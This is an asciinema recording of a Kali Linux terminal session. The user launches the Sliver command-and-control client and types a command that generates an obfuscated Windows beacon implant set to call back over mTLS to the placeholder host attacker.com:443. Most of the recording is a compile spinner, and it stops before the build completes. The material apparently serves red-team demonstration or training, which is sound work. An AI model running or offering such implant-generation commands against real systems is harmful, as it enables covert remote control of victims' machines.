{"version": 2, "width": 137, "height": 38, "timestamp": 1702835089, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.097852, "o", "                                                                                                                                         \r\r"]
[0.155329, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[0.156106, "o", "\u001b[?1h\u001b="]
[0.157882, "o", "\u001b[?2004h"]
[1.125575, "o", "\u001b[1ms\u001b[0m"]
[1.126513, "o", "\b\u001b[1ms\u001b[0m\u001b[38;2;153;153;153mliver\u001b[39m\b\b\b\b\b"]
[1.421601, "o", "\b\u001b[1ms\u001b[39m\u001b[1ml\u001b[0m"]
[1.615189, "o", "\b\b\u001b[1ms\u001b[1ml\u001b[39m\u001b[1mi\u001b[0m\u001b[38;2;153;153;153mi\u001b[38;2;153;153;153mv\u001b[38;2;153;153;153me\u001b[38;2;153;153;153mr\u001b[39m\b\b\b\b"]
[1.629916, "o", "\b\u001b[1mi\u001b[39m\u001b[1mv\u001b[0m\u001b[39m \u001b[39m \u001b[39m \b\b\b"]
[1.630831, "o", "\u001b[38;2;153;153;153mer\u001b[39m\b\b"]
[1.759956, "o", "\b\u001b[1mv\u001b[39m\u001b[1me\u001b[0m"]
[1.853356, "o", "\b\b\b\b\b\u001b[0m\u001b[36ms\u001b[0m\u001b[36ml\u001b[0m\u001b[36mi\u001b[0m\u001b[36mv\u001b[0m\u001b[36me\u001b[36mr\u001b[39m"]
[2.236531, "o", "\u001b[?1l\u001b>"]
[2.23892, "o", "\u001b[?2004l\r\r\n"]
[2.296279, "o", "Connecting to localhost:31337 ...\r\n"]
[2.344065, "o", "\u001b[m"]
[2.346097, "o", "\u001b[1m\u001b[37m\r\n.------..------..------..------..------..------.\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\n`------'`------'`------'`------'`------'`------'\r\n\u001b[0m\r\nAll hackers gain indestructible\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\n\r\n"]
[2.346478, "o", "\u001b[0m\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[3.00925, "o", "\u001b[J\u001b[2K\r"]
[3.010337, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mg"]
[3.208022, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mge"]
[3.302823, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgen"]
[3.372922, "o", "\u001b[J\u001b[2K\r"]
[3.373021, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgene"]
[3.70229, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgener"]
[4.052038, "o", "\u001b[J\u001b[2K\r"]
[4.052339, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenera"]
[4.510978, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate "]
[5.054448, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate b"]
[5.280013, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate be"]
[5.46739, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon "]
[6.419442, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon -"]
[6.614411, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --"]
[6.856392, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --m"]
[7.095018, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mt"]
[7.266718, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtl"]
[7.505325, "o", "\u001b[J\u001b[2K\r"]
[7.505432, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls"]
[7.700302, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls "]
[7.899072, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls a"]
[8.035391, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls at"]
[8.199555, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls att"]
[8.419739, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls atta"]
[8.527686, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attac"]
[8.947179, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attack\u001b[J\u001b[2K\r"]
[8.947632, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacke\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker"]
[9.102625, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker."]
[9.250979, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.c"]
[9.470126, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.co"]
[9.473668, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com"]
[10.219427, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:"]
[10.62294, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:4"]
[11.043501, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:44"]
[11.059748, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443"]
[11.404661, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 "]
[11.739648, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 -"]
[12.091586, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --"]
[12.615716, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --s"]
[12.712567, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --sa"]
[12.797343, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --sav"]
[13.139634, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save "]
[13.663953, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save b"]
[13.759355, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save be"]
[13.856114, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save bea"]
[14.058062, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beac"]
[14.186399, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beaco"]
[14.303636, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon"]
[14.908132, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.e"]
[14.993707, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.ex"]
[15.427513, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.exe"]
[15.95164, "o", "\u001b[J\u001b[2K\r"]
[15.952182, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.exe\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate beacon --mtls attacker.com:443 --save beacon.exe\r\n\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new windows/amd64 beacon implant binary (1m0s)\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m\u001b[1mSymbol obfuscation is enabled\u001b[0m\r\n"]
[16.054085, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[16.154487, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[16.254959, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[16.355704, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[16.45606, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[16.556463, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[16.656856, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[16.757153, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[16.857447, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[16.957819, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[17.058208, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[17.158568, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[17.258966, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[17.35946, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[17.459916, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[17.560455, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[17.660855, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[17.763183, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[17.861645, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[17.962051, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[18.062439, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[18.162895, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[18.263269, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[18.363695, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[18.464076, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[18.564554, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[18.665214, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[18.76571, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[18.866136, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[18.966534, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[19.066918, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[19.167222, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[19.267616, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[19.368009, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[19.468418, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[19.568772, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[19.669137, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[19.769534, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[19.869907, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[19.970298, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[20.070699, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[20.171098, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[20.271482, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[20.371884, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[20.472273, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[20.572694, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[20.673098, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[20.773502, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[20.873903, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[20.974313, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[21.074712, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[21.175096, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[21.275502, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[21.376149, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[21.476547, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[21.576905, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[21.677312, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[21.777687, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[21.878097, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[21.978483, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[22.078864, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[22.179281, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[22.279671, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[22.380071, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[22.480427, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[22.580771, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[22.681169, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[22.781562, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[22.881972, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[22.982331, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[23.082766, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[23.183105, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[23.283498, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[23.383944, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[23.484236, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[23.584636, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[23.685062, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[23.785467, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[23.885897, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[23.986321, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[24.086759, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[24.187166, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[24.287475, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[24.387901, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[24.488271, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[24.588657, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[24.689065, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[24.789467, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[24.88987, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[24.990292, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[25.090709, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[25.191135, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[25.291551, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[25.391987, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[25.49242, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[25.592834, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[25.693163, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[25.793585, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[25.893982, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[25.994356, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[26.094723, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[26.195172, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[26.295622, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[26.396087, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[26.496532, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[26.596959, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[26.697402, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[26.79782, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[26.898231, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[26.998582, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[27.099007, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[27.199433, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[27.2999, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[27.400352, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[27.500823, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[27.601142, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[27.701551, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[27.801948, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[27.902362, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[28.002761, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[28.103173, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[28.203584, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[28.304012, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[28.40444, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[28.504864, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[28.605202, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[28.705556, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[28.80599, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[28.9064, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[29.006944, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[29.107364, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[29.207783, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[29.308185, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[29.40876, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[29.509184, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[29.609583, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[29.710009, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[29.810414, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[29.910815, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[30.011255, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[30.111699, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[30.212078, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[30.312498, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[30.412965, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[30.513353, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[30.613763, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[30.714177, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[30.814615, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[30.915033, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[31.015441, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[31.115908, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[31.216293, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[31.316708, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[31.417136, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[31.517546, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[31.617956, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[31.718385, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[31.818808, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[31.919252, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[32.019676, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[32.120074, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[32.220516, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[32.320919, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[32.421326, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[32.521744, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[32.62216, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[32.722605, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[32.82298, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[32.923317, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[33.02407, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[33.124441, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[33.224846, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[33.325173, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[33.425622, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[33.526046, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[33.626492, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[33.726914, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[33.82733, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[33.927765, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[34.028162, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[34.128487, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[34.228889, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[34.329312, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[34.429731, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[34.530105, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[34.630526, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[34.730944, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[34.831249, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[34.931636, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[35.032073, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[35.132486, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[35.232875, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[35.333288, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[35.433609, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[35.534006, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[35.634472, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[35.734913, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[35.83535, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[35.935774, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[36.036187, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[36.136585, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[36.237009, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[36.33742, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[36.437844, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[36.538405, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[36.638801, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[36.739211, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[36.839629, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[36.940067, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[37.040478, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[37.140892, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[37.241297, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[37.341697, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[37.442111, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[37.542537, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[37.642954, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[37.74336, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[37.843907, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[37.944306, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[38.044686, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[38.145196, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[38.245427, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[38.34584, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[38.446258, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[38.546641, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[38.647053, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[38.747372, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[38.847785, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[38.948202, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[39.048597, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[39.14901, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[39.249407, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[39.349794, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[39.450216, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[39.5506, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[39.65101, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[39.751425, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[39.851835, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[39.952235, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[40.052669, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[40.153086, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[40.253489, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[40.353916, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[40.454334, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[40.554749, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[40.655121, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[40.755512, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
